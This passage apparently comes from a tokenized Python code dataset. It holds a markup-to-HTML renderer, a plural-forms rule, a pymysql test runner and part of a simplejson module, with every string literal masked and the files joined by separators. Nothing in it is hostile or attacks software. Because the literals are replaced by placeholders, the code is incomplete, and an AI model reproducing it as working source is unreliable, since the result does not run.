endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return '<STR_LIT>' % url <EOL> return '<STR_LIT>' % ( url , url ) <EOL> def protolinks_simple ( proto , url ) : <EOL> """<STR_LIT>""" <EOL> if proto in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' % url <EOL> elif proto == '<STR_LIT>' : <EOL> return '<STR_LIT>' % url <EOL> return proto + '<STR_LIT::>' + url <EOL> def email_simple ( email ) : <EOL> return '<STR_LIT>' % ( email , email ) <EOL> def render ( text , <EOL> extra = { } , <EOL> allowed = { } , <EOL> sep = '<STR_LIT:p>' , <EOL> URL = None , <EOL> environment = None , <EOL> latex = '<STR_LIT>' , <EOL> autolinks = '<STR_LIT:default>' , <EOL> protolinks = '<STR_LIT:default>' , <EOL> class_prefix = '<STR_LIT>' , <EOL> id_prefix = '<STR_LIT>' , <EOL> pretty_print = False ) : <EOL> """<STR_LIT>""" <EOL> if autolinks == "<STR_LIT:default>" : autolinks = autolinks_simple <EOL> if protolinks == "<STR_LIT:default>" : protolinks = protolinks_simple <EOL> pp = '<STR_LIT:\n>' if pretty_print else '<STR_LIT>' <EOL> if isinstance ( text , unicode ) : <EOL> text = text . encode ( '<STR_LIT:utf8>' ) <EOL> text = str ( text or '<STR_LIT>' ) <EOL> text = regex_backslash . sub ( lambda m : m . group ( <NUM_LIT:1> ) . translate ( ttab_in ) , text ) <EOL> text = text . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) <EOL> if URL is not None : <EOL> text = replace_at_urls ( text , URL ) <EOL> if latex == '<STR_LIT>' : <EOL> text = regex_dd . sub ( '<STR_LIT>' , text ) <EOL> segments = [ ] <EOL> def mark_code ( m ) : <EOL> g = m . group ( <NUM_LIT:0> ) <EOL> if g in ( META , DISABLED_META ) : <EOL> segments . append ( ( None , None , None , g ) ) <EOL> return m . group ( ) <EOL> elif g == '<STR_LIT>' : <EOL> segments . append ( ( None , None , None , '<STR_LIT>' ) ) <EOL> return m . group ( ) <EOL> else : <EOL> c = m . group ( '<STR_LIT:c>' ) or '<STR_LIT>' <EOL> p = m . 
group ( '<STR_LIT:p>' ) or '<STR_LIT>' <EOL> if '<STR_LIT:code>' in allowed and not c in allowed [ '<STR_LIT:code>' ] : c = '<STR_LIT>' <EOL> code = m . group ( '<STR_LIT:t>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> segments . append ( ( code , c , p , m . group ( <NUM_LIT:0> ) ) ) <EOL> return META <EOL> text = regex_code . sub ( mark_code , text ) <EOL> links = [ ] <EOL> def mark_link ( m ) : <EOL> links . append ( None if m . group ( ) == LINK <EOL> else m . group ( '<STR_LIT:s>' ) ) <EOL> return LINK <EOL> text = regex_link . sub ( mark_link , text ) <EOL> text = escape ( text ) <EOL> if protolinks : <EOL> text = regex_proto . sub ( lambda m : protolinks ( * m . group ( '<STR_LIT:p>' , '<STR_LIT:k>' ) ) , text ) <EOL> if autolinks : <EOL> text = replace_autolinks ( text , autolinks ) <EOL> strings = text . split ( '<STR_LIT:\n>' ) <EOL> def parse_title ( t , s ) : <EOL> hlevel = str ( len ( t ) ) <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> out . append ( "<STR_LIT>" % ( hlevel , s ) ) <EOL> etags [ : ] = [ "<STR_LIT>" % ( hlevel , pp ) ] <EOL> lev = <NUM_LIT:0> <EOL> ltags [ : ] = [ ] <EOL> tlev [ : ] = [ ] <EOL> return ( lev , '<STR_LIT:h>' ) <EOL> def parse_list ( t , p , s , tag , lev , mtag , lineno ) : <EOL> lent = len ( t ) <EOL> if lent < lev : <EOL> while ltags [ - <NUM_LIT:1> ] > lent : <EOL> ltags . pop ( ) <EOL> out . append ( etags . pop ( ) ) <EOL> lev = lent <EOL> tlev [ lev : ] = [ ] <EOL> if lent > lev : <EOL> if lev == <NUM_LIT:0> : <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> ltags [ : ] = [ ] <EOL> tlev [ : ] = [ ] <EOL> etags [ : ] = [ ] <EOL> if pend and mtag == '<STR_LIT:.>' : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> for i in xrange ( lent - lev ) : <EOL> out . append ( '<STR_LIT:<>' + tag + '<STR_LIT:>>' + pp ) <EOL> etags . append ( '<STR_LIT>' + tag + '<STR_LIT:>>' + pp ) <EOL> lev += <NUM_LIT:1> <EOL> ltags . append ( lev ) <EOL> tlev . 
append ( tag ) <EOL> elif lent == lev : <EOL> if tlev [ - <NUM_LIT:1> ] != tag : <EOL> for i in xrange ( ltags . count ( lent ) ) : <EOL> ltags . pop ( ) <EOL> out . append ( etags . pop ( ) ) <EOL> tlev [ - <NUM_LIT:1> ] = tag <EOL> out . append ( '<STR_LIT:<>' + tag + '<STR_LIT:>>' + pp ) <EOL> etags . append ( '<STR_LIT>' + tag + '<STR_LIT:>>' + pp ) <EOL> ltags . append ( lev ) <EOL> else : <EOL> if ltags . count ( lev ) > <NUM_LIT:1> : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> mtag = '<STR_LIT:l>' <EOL> out . append ( '<STR_LIT>' ) <EOL> etags . append ( '<STR_LIT>' + pp ) <EOL> ltags . append ( lev ) <EOL> if s [ : <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> ( s , mtag , lineno ) = parse_table_or_blockquote ( s , mtag , lineno ) <EOL> if p and mtag == '<STR_LIT:l>' : <EOL> ( lev , mtag , lineno ) = parse_point ( t , s , lev , '<STR_LIT>' , lineno ) <EOL> else : <EOL> out . append ( s ) <EOL> return ( lev , mtag , lineno ) <EOL> def parse_point ( t , s , lev , mtag , lineno ) : <EOL> """<STR_LIT>""" <EOL> lent = len ( t ) <EOL> if lent > lev : <EOL> return parse_list ( t , '<STR_LIT:.>' , s , '<STR_LIT>' , lev , mtag , lineno ) <EOL> elif lent < lev : <EOL> while ltags [ - <NUM_LIT:1> ] > lent : <EOL> ltags . pop ( ) <EOL> out . append ( etags . pop ( ) ) <EOL> lev = lent <EOL> tlev [ lev : ] = [ ] <EOL> mtag = '<STR_LIT>' <EOL> elif lent == lev : <EOL> if pend and mtag == '<STR_LIT:.>' : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> if br and mtag in ( '<STR_LIT:l>' , '<STR_LIT:.>' ) : <EOL> out . append ( br ) <EOL> if s == META : <EOL> mtag = '<STR_LIT>' <EOL> else : <EOL> mtag = '<STR_LIT:.>' <EOL> if s [ : <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> ( s , mtag , lineno ) = parse_table_or_blockquote ( s , mtag , lineno ) <EOL> if mtag == '<STR_LIT:.>' : <EOL> out . append ( pbeg ) <EOL> if pend : <EOL> etags . append ( pend ) <EOL> ltags . append ( lev ) <EOL> out . 
append ( s ) <EOL> return ( lev , mtag , lineno ) <EOL> def parse_table_or_blockquote ( s , mtag , lineno ) : <EOL> if ( lineno + <NUM_LIT:1> >= strings_len or <EOL> not ( s . count ( '<STR_LIT:->' ) == len ( s ) and len ( s ) > <NUM_LIT:3> ) ) : <EOL> return ( s , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> s = strings [ lineno ] . strip ( ) <EOL> if s : <EOL> if '<STR_LIT:|>' in s : <EOL> tout = [ ] <EOL> thead = [ ] <EOL> tbody = [ ] <EOL> rownum = <NUM_LIT:0> <EOL> t_id = '<STR_LIT>' <EOL> t_cls = '<STR_LIT>' <EOL> while lineno < strings_len : <EOL> s = strings [ lineno ] . strip ( ) <EOL> if s [ : <NUM_LIT:1> ] == '<STR_LIT:=>' : <EOL> if s . count ( '<STR_LIT:=>' ) == len ( s ) and len ( s ) > <NUM_LIT:3> : <EOL> if not thead : <EOL> thead = tout <EOL> else : <EOL> tbody . extend ( tout ) <EOL> tout = [ ] <EOL> rownum = <NUM_LIT:0> <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> m = regex_tq . match ( s ) <EOL> if m : <EOL> t_cls = m . group ( '<STR_LIT:c>' ) or '<STR_LIT>' <EOL> t_id = m . group ( '<STR_LIT:p>' ) or '<STR_LIT>' <EOL> break <EOL> if rownum % <NUM_LIT:2> : <EOL> tr = '<STR_LIT>' <EOL> else : <EOL> tr = '<STR_LIT>' if rownum == <NUM_LIT:0> else '<STR_LIT>' <EOL> tout . append ( tr + '<STR_LIT>' . join ( [ '<STR_LIT>' % ( <EOL> '<STR_LIT>' <EOL> if regex_num . match ( f ) else '<STR_LIT>' , <EOL> f . strip ( ) <EOL> ) for f in s . split ( '<STR_LIT:|>' ) ] ) + '<STR_LIT>' + pp ) <EOL> rownum += <NUM_LIT:1> <EOL> lineno += <NUM_LIT:1> <EOL> t_cls = '<STR_LIT>' % ( class_prefix , t_cls ) if t_cls and t_cls != '<STR_LIT:id>' else '<STR_LIT>' <EOL> t_id = '<STR_LIT>' % ( id_prefix , t_id ) if t_id else '<STR_LIT>' <EOL> s = '<STR_LIT>' <EOL> if thead : <EOL> s += '<STR_LIT>' + pp + '<STR_LIT>' . join ( [ l for l in thead ] ) + '<STR_LIT>' + pp <EOL> if not tbody : <EOL> tbody = tout <EOL> tout = [ ] <EOL> if tbody : <EOL> s += '<STR_LIT>' + pp + '<STR_LIT>' . 
join ( [ l for l in tbody ] ) + '<STR_LIT>' + pp <EOL> if tout : <EOL> s += '<STR_LIT>' + pp + '<STR_LIT>' . join ( [ l for l in tout ] ) + '<STR_LIT>' + pp <EOL> s = '<STR_LIT>' % ( t_cls , t_id , pp , s , pp ) <EOL> mtag = '<STR_LIT:t>' <EOL> else : <EOL> bq_begin = lineno <EOL> t_mode = False <EOL> t_cls = '<STR_LIT>' <EOL> t_id = '<STR_LIT>' <EOL> while lineno < strings_len : <EOL> s = strings [ lineno ] . strip ( ) <EOL> if not t_mode : <EOL> m = regex_tq . match ( s ) <EOL> if m : <EOL> if ( lineno + <NUM_LIT:1> == strings_len or <EOL> '<STR_LIT:|>' not in strings [ lineno + <NUM_LIT:1> ] ) : <EOL> t_cls = m . group ( '<STR_LIT:c>' ) or '<STR_LIT>' <EOL> t_id = m . group ( '<STR_LIT:p>' ) or '<STR_LIT>' <EOL> break <EOL> if regex_bq_headline . match ( s ) : <EOL> if ( lineno + <NUM_LIT:1> < strings_len and <EOL> strings [ lineno + <NUM_LIT:1> ] . strip ( ) ) : <EOL> t_mode = True <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> elif regex_tq . match ( s ) : <EOL> t_mode = False <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> lineno += <NUM_LIT:1> <EOL> t_cls = '<STR_LIT>' % ( class_prefix , t_cls ) if t_cls and t_cls != '<STR_LIT:id>' else '<STR_LIT>' <EOL> t_id = '<STR_LIT>' % ( id_prefix , t_id ) if t_id else '<STR_LIT>' <EOL> s = '<STR_LIT>' % ( t_cls , <EOL> t_id , <EOL> '<STR_LIT:\n>' . 
join ( strings [ bq_begin : lineno ] ) , pp ) <EOL> mtag = '<STR_LIT:q>' <EOL> else : <EOL> s = '<STR_LIT>' <EOL> lineno -= <NUM_LIT:1> <EOL> mtag = '<STR_LIT:q>' <EOL> return ( s , '<STR_LIT:q>' , lineno ) <EOL> if sep == '<STR_LIT:p>' : <EOL> pbeg = "<STR_LIT>" <EOL> pend = "<STR_LIT>" + pp <EOL> br = '<STR_LIT>' <EOL> else : <EOL> pbeg = pend = '<STR_LIT>' <EOL> br = "<STR_LIT>" + pp if sep == '<STR_LIT>' else '<STR_LIT>' <EOL> lev = <NUM_LIT:0> <EOL> c0 = '<STR_LIT>' <EOL> out = [ ] <EOL> etags = [ ] <EOL> ltags = [ ] <EOL> tlev = [ ] <EOL> mtag = '<STR_LIT>' <EOL> lineno = <NUM_LIT:0> <EOL> strings_len = len ( strings ) <EOL> while lineno < strings_len : <EOL> s0 = strings [ lineno ] [ : <NUM_LIT:1> ] <EOL> s = strings [ lineno ] . strip ( ) <EOL> """<STR_LIT>""" <EOL> pc0 = c0 <EOL> c0 = s [ : <NUM_LIT:1> ] <EOL> if c0 : <EOL> if c0 in "<STR_LIT>" : <EOL> ( t1 , t2 , p , ss ) = regex_list . findall ( s ) [ <NUM_LIT:0> ] <EOL> if t1 or t2 : <EOL> if c0 == '<STR_LIT:#>' : <EOL> ( lev , mtag ) = parse_title ( t1 , ss ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> elif c0 == '<STR_LIT:+>' : <EOL> ( lev , mtag , lineno ) = parse_list ( t2 , p , ss , '<STR_LIT>' , lev , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> elif c0 == '<STR_LIT:->' : <EOL> if p or ss : <EOL> ( lev , mtag , lineno ) = parse_list ( t2 , p , ss , '<STR_LIT>' , lev , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> else : <EOL> ( s , mtag , lineno ) = parse_table_or_blockquote ( s , mtag , lineno ) <EOL> elif lev > <NUM_LIT:0> : <EOL> ( lev , mtag , lineno ) = parse_point ( t2 , ss , lev , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> if lev == <NUM_LIT:0> and ( mtag == '<STR_LIT:q>' or s == META ) : <EOL> pc0 = '<STR_LIT>' <EOL> if pc0 == '<STR_LIT>' or ( mtag != '<STR_LIT:p>' and s0 not in ( '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ) ) : <EOL> out . 
extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> etags = [ ] <EOL> ltags = [ ] <EOL> tlev = [ ] <EOL> lev = <NUM_LIT:0> <EOL> if br and mtag == '<STR_LIT:p>' : out . append ( br ) <EOL> if mtag != '<STR_LIT:q>' and s != META : <EOL> if pend : etags = [ pend ] <EOL> out . append ( pbeg ) <EOL> mtag = '<STR_LIT:p>' <EOL> else : <EOL> mtag = '<STR_LIT>' <EOL> out . append ( s ) <EOL> else : <EOL> if lev > <NUM_LIT:0> and mtag == '<STR_LIT:.>' and s == META : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> out . append ( s ) <EOL> mtag = '<STR_LIT>' <EOL> else : <EOL> out . append ( '<STR_LIT:U+0020>' + s ) <EOL> lineno += <NUM_LIT:1> <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> text = '<STR_LIT>' . join ( out ) <EOL> text = regex_strong . sub ( '<STR_LIT>' , text ) <EOL> text = regex_del . sub ( '<STR_LIT>' , text ) <EOL> text = regex_em . sub ( '<STR_LIT>' , text ) <EOL> def sub_media ( m ) : <EOL> t , a , k , p , w = m . group ( '<STR_LIT:t>' , '<STR_LIT:a>' , '<STR_LIT:k>' , '<STR_LIT:p>' , '<STR_LIT:w>' ) <EOL> if not k : <EOL> return m . group ( <NUM_LIT:0> ) <EOL> k = escape ( k ) <EOL> t = t or '<STR_LIT>' <EOL> style = '<STR_LIT>' % w if w else '<STR_LIT>' <EOL> title = '<STR_LIT>' % escape ( a ) . replace ( META , DISABLED_META ) if a else '<STR_LIT>' <EOL> p_begin = p_end = '<STR_LIT>' <EOL> if p == '<STR_LIT>' : <EOL> p_begin = '<STR_LIT>' <EOL> p_end = '<STR_LIT>' + pp <EOL> elif p == '<STR_LIT>' : <EOL> p_begin = '<STR_LIT>' <EOL> p_end = '<STR_LIT>' + pp <EOL> elif p == '<STR_LIT>' : <EOL> p_begin = '<STR_LIT>' <EOL> p_end = '<STR_LIT>' + pp <EOL> elif p in ( '<STR_LIT:left>' , '<STR_LIT:right>' ) : <EOL> style = ( '<STR_LIT>' % p ) + ( '<STR_LIT>' % style if style else '<STR_LIT>' ) <EOL> if t and regex_auto . 
match ( t ) : <EOL> p_begin = p_begin + '<STR_LIT>' % t <EOL> p_end = '<STR_LIT>' + p_end <EOL> t = '<STR_LIT>' <EOL> if style : <EOL> style = '<STR_LIT>' % style <EOL> if p in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> t = render ( t , { } , { } , '<STR_LIT>' , URL , environment , latex , <EOL> autolinks , protolinks , class_prefix , id_prefix , pretty_print ) <EOL> return '<STR_LIT>' % dict ( p = p , title = title , style = style , k = k , t = t ) <EOL> alt = '<STR_LIT>' % escape ( t ) . replace ( META , DISABLED_META ) if t else '<STR_LIT>' <EOL> return '<STR_LIT>' % dict ( begin = p_begin , k = k , alt = alt , title = title , style = style , end = p_end ) <EOL> def sub_link ( m ) : <EOL> t , a , k , p = m . group ( '<STR_LIT:t>' , '<STR_LIT:a>' , '<STR_LIT:k>' , '<STR_LIT:p>' ) <EOL> if not k and not t : <EOL> return m . group ( <NUM_LIT:0> ) <EOL> t = t or '<STR_LIT>' <EOL> a = escape ( a ) if a else '<STR_LIT>' <EOL> if k : <EOL> if '<STR_LIT:#>' in k and not '<STR_LIT::>' in k . split ( '<STR_LIT:#>' ) [ <NUM_LIT:0> ] : <EOL> k = k . replace ( '<STR_LIT:#>' , '<STR_LIT:#>' + id_prefix ) <EOL> k = escape ( k ) <EOL> title = '<STR_LIT>' % a . replace ( META , DISABLED_META ) if a else '<STR_LIT>' <EOL> target = '<STR_LIT>' if p == '<STR_LIT>' else '<STR_LIT>' <EOL> t = render ( t , { } , { } , '<STR_LIT>' , URL , environment , latex , None , <EOL> None , class_prefix , id_prefix , pretty_print ) if t else k <EOL> return '<STR_LIT>' % dict ( k = k , title = title , target = target , t = t ) <EOL> if t == '<STR_LIT>' and not a : <EOL> return '<STR_LIT>' + pp <EOL> return '<STR_LIT>' % ( <EOL> escape ( id_prefix + t ) , <EOL> render ( a , { } , { } , '<STR_LIT>' , URL , <EOL> environment , latex , autolinks , <EOL> protolinks , class_prefix , <EOL> id_prefix , pretty_print ) ) <EOL> parts = text . 
split ( LINK ) <EOL> text = parts [ <NUM_LIT:0> ] <EOL> for i , s in enumerate ( links ) : <EOL> if s == None : <EOL> html = LINK <EOL> else : <EOL> html = regex_media_level2 . sub ( sub_media , s ) <EOL> if html == s : <EOL> html = regex_link_level2 . sub ( sub_link , html ) <EOL> if html == s : <EOL> html = '<STR_LIT>' % s <EOL> text += html + parts [ i + <NUM_LIT:1> ] <EOL> def expand_meta ( m ) : <EOL> code , b , p , s = segments . pop ( <NUM_LIT:0> ) <EOL> if code == None or m . group ( ) == DISABLED_META : <EOL> return escape ( s ) <EOL> if b in extra : <EOL> if code [ : <NUM_LIT:1> ] == '<STR_LIT:\n>' : code = code [ <NUM_LIT:1> : ] <EOL> if code [ - <NUM_LIT:1> : ] == '<STR_LIT:\n>' : code = code [ : - <NUM_LIT:1> ] <EOL> if p : <EOL> return str ( extra [ b ] ( code , p ) ) <EOL> else : <EOL> return str ( extra [ b ] ( code ) ) <EOL> elif b == '<STR_LIT>' : <EOL> return '<STR_LIT:[>' + '<STR_LIT:U+002C>' . join ( '<STR_LIT>' % ( id_prefix + d , b , d ) for d in escape ( code ) . split ( '<STR_LIT:U+002C>' ) ) + '<STR_LIT:]>' <EOL> elif b == '<STR_LIT>' : <EOL> return LATEX % urllib . quote ( code ) <EOL> elif b in html_colors : <EOL> return '<STR_LIT>' % ( b , render ( code , { } , { } , '<STR_LIT>' , URL , environment , latex , <EOL> autolinks , protolinks , class_prefix , id_prefix , pretty_print ) ) <EOL> elif b in ( '<STR_LIT:c>' , '<STR_LIT>' ) and p : <EOL> c = p . 
split ( '<STR_LIT::>' ) <EOL> fg = '<STR_LIT>' % c [ <NUM_LIT:0> ] if c [ <NUM_LIT:0> ] else '<STR_LIT>' <EOL> bg = '<STR_LIT>' % c [ <NUM_LIT:1> ] if len ( c ) > <NUM_LIT:1> and c [ <NUM_LIT:1> ] else '<STR_LIT>' <EOL> return '<STR_LIT>' % ( fg , bg , render ( code , { } , { } , '<STR_LIT>' , URL , environment , latex , <EOL> autolinks , protolinks , class_prefix , id_prefix , pretty_print ) ) <EOL> cls = '<STR_LIT>' % ( class_prefix , b ) if b and b != '<STR_LIT:id>' else '<STR_LIT>' <EOL> id = '<STR_LIT>' % ( id_prefix , escape ( p ) ) if p else '<STR_LIT>' <EOL> beg = ( code [ : <NUM_LIT:1> ] == '<STR_LIT:\n>' ) <EOL> end = [ None , - <NUM_LIT:1> ] [ code [ - <NUM_LIT:1> : ] == '<STR_LIT:\n>' ] <EOL> if beg and end : <EOL> return '<STR_LIT>' % ( cls , id , escape ( code [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) , pp ) <EOL> return '<STR_LIT>' % ( cls , id , escape ( code [ beg : end ] ) ) <EOL> text = regex_expand_meta . sub ( expand_meta , text ) <EOL> if environment : <EOL> text = replace_components ( text , environment ) <EOL> return text . translate ( ttab_out ) <EOL> def markmin2html ( text , extra = { } , allowed = { } , sep = '<STR_LIT:p>' , <EOL> autolinks = '<STR_LIT:default>' , protolinks = '<STR_LIT:default>' , <EOL> class_prefix = '<STR_LIT>' , id_prefix = '<STR_LIT>' , pretty_print = False ) : <EOL> return render ( text , extra , allowed , sep , <EOL> autolinks = autolinks , protolinks = protolinks , <EOL> class_prefix = class_prefix , id_prefix = id_prefix , <EOL> pretty_print = pretty_print ) <EOL> def run_doctests ( ) : <EOL> import doctest <EOL> doctest . testmod ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> import doctest <EOL> from textwrap import dedent <EOL> html = dedent ( """<STR_LIT>""" ) [ <NUM_LIT:1> : ] <EOL> if sys . 
argv [ <NUM_LIT:1> : <NUM_LIT:2> ] == [ '<STR_LIT>' ] : <EOL> style = dedent ( """<STR_LIT>""" ) [ <NUM_LIT:1> : ] <EOL> print html % dict ( title = "<STR_LIT>" , <EOL> style = style , <EOL> body = markmin2html ( __doc__ , pretty_print = True ) ) <EOL> elif sys . argv [ <NUM_LIT:1> : <NUM_LIT:2> ] == [ '<STR_LIT>' ] : <EOL> from timeit import Timer <EOL> loops = <NUM_LIT:1000> <EOL> ts = Timer ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> print '<STR_LIT>' <EOL> t = min ( [ ts . timeit ( loops ) for i in range ( <NUM_LIT:3> ) ] ) <EOL> print "<STR_LIT>" % ( loops , t / <NUM_LIT:1000> * loops ) <EOL> elif len ( sys . argv ) > <NUM_LIT:1> : <EOL> fargv = open ( sys . argv [ <NUM_LIT:1> ] , '<STR_LIT:r>' ) <EOL> try : <EOL> markmin_text = fargv . read ( ) <EOL> if len ( sys . argv ) > <NUM_LIT:2> : <EOL> if sys . argv [ <NUM_LIT:2> ] . startswith ( '<STR_LIT:@>' ) : <EOL> markmin_style = '<STR_LIT>' + sys . argv [ <NUM_LIT:2> ] [ <NUM_LIT:1> : ] + '<STR_LIT>' <EOL> else : <EOL> fargv2 = open ( sys . argv [ <NUM_LIT:2> ] , '<STR_LIT:r>' ) <EOL> try : <EOL> markmin_style = "<STR_LIT>" + fargv2 . read ( ) + "<STR_LIT>" <EOL> finally : <EOL> fargv2 . close ( ) <EOL> else : <EOL> markmin_style = "<STR_LIT>" <EOL> print html % dict ( title = sys . argv [ <NUM_LIT:1> ] , style = markmin_style , <EOL> body = markmin2html ( markmin_text , pretty_print = True ) ) <EOL> finally : <EOL> fargv . close ( ) <EOL> else : <EOL> print "<STR_LIT>" + sys . argv [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> run_doctests ( ) </s>
<s> nplurals = <NUM_LIT:2> <EOL> get_plural_id = lambda n : int ( n != <NUM_LIT:1> ) </s>
<s> from pymysql . tests . test_issues import * <EOL> from pymysql . tests . test_example import * <EOL> from pymysql . tests . test_basic import * <EOL> from pymysql . tests . test_DictCursor import * <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> from pymysql . tests . thirdparty import * <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import unittest <EOL> unittest . main ( ) </s>
<s> r"""<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> __author__ = '<STR_LIT>' <EOL> from decimal import Decimal <EOL> from decoder import JSONDecoder , JSONDecodeError <EOL> from encoder import JSONEncoder <EOL> def _import_OrderedDict ( ) : <EOL> import collections <EOL> try : <EOL> return collections . OrderedDict <EOL> except AttributeError : <EOL> import ordered_dict <EOL> return ordered_dict . OrderedDict <EOL> OrderedDict = _import_OrderedDict ( ) <EOL> def _import_c_make_encoder ( ) : <EOL> try : <EOL> raise ImportError <EOL> from simplejson . _speedups import make_encoder <EOL> return make_encoder <EOL> except ImportError : <EOL> return None <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> use_decimal = False , <EOL> ) <EOL> def dump ( obj , fp , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not use_decimal <EOL> and not kw ) : <EOL> iterable = _default_encoder . 
iterencode ( obj ) <EOL> else : <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> iterable = cls ( skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , <EOL> default = default , use_decimal = use_decimal , ** kw ) . iterencode ( obj ) <EOL> for chunk in iterable : <EOL> fp . write ( chunk ) <EOL> def dumps ( obj , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not use_decimal <EOL> and not kw ) : <EOL> return _default_encoder . encode ( obj ) <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> return cls ( <EOL> skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , default = default , <EOL> use_decimal = use_decimal , ** kw ) . encode ( obj ) <EOL> _default_decoder = JSONDecoder ( encoding = None , object_hook = None , <EOL> object_pairs_hook = None ) <EOL> def load ( fp , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , <EOL> use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return loads ( fp . 
read ( ) , <EOL> encoding = encoding , cls = cls , object_hook = object_hook , <EOL> parse_float = parse_float , parse_int = parse_int , <EOL> parse_constant = parse_constant , object_pairs_hook = object_pairs_hook , <EOL> use_decimal = use_decimal , ** kw ) <EOL> def loads ( s , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , <EOL> use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( cls is None and encoding is None and object_hook is None and <EOL> parse_int is None and parse_float is None and <EOL> parse_constant is None and object_pairs_hook is None <EOL> and not use_decimal and not kw ) : <EOL> return _default_decoder . decode ( s ) <EOL> if cls is None : <EOL> cls = JSONDecoder <EOL> if object_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_hook <EOL> if object_pairs_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_pairs_hook <EOL> if parse_float is not None : <EOL> kw [ '<STR_LIT>' ] = parse_float <EOL> if parse_int is not None : <EOL> kw [ '<STR_LIT>' ] = parse_int <EOL> if parse_constant is not None : <EOL> kw [ '<STR_LIT>' ] = parse_constant <EOL> if use_decimal : <EOL> if parse_float is not None : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> kw [ '<STR_LIT>' ] = Decimal <EOL> return cls ( encoding = encoding , ** kw ) . decode ( s ) <EOL> def _toggle_speedups ( enabled ) : <EOL> import decoder as dec <EOL> import encoder as enc <EOL> import scanner as scan <EOL> c_make_encoder = _import_c_make_encoder ( ) <EOL> if enabled : <EOL> dec . scanstring = dec . c_scanstring or dec . py_scanstring <EOL> enc . c_make_encoder = c_make_encoder <EOL> enc . encode_basestring_ascii = ( enc . c_encode_basestring_ascii or <EOL> enc . py_encode_basestring_ascii ) <EOL> scan . make_scanner = scan . c_make_scanner or scan . py_make_scanner <EOL> else : <EOL> dec . scanstring = dec . py_scanstring <EOL> enc . c_make_encoder = None <EOL> enc . 
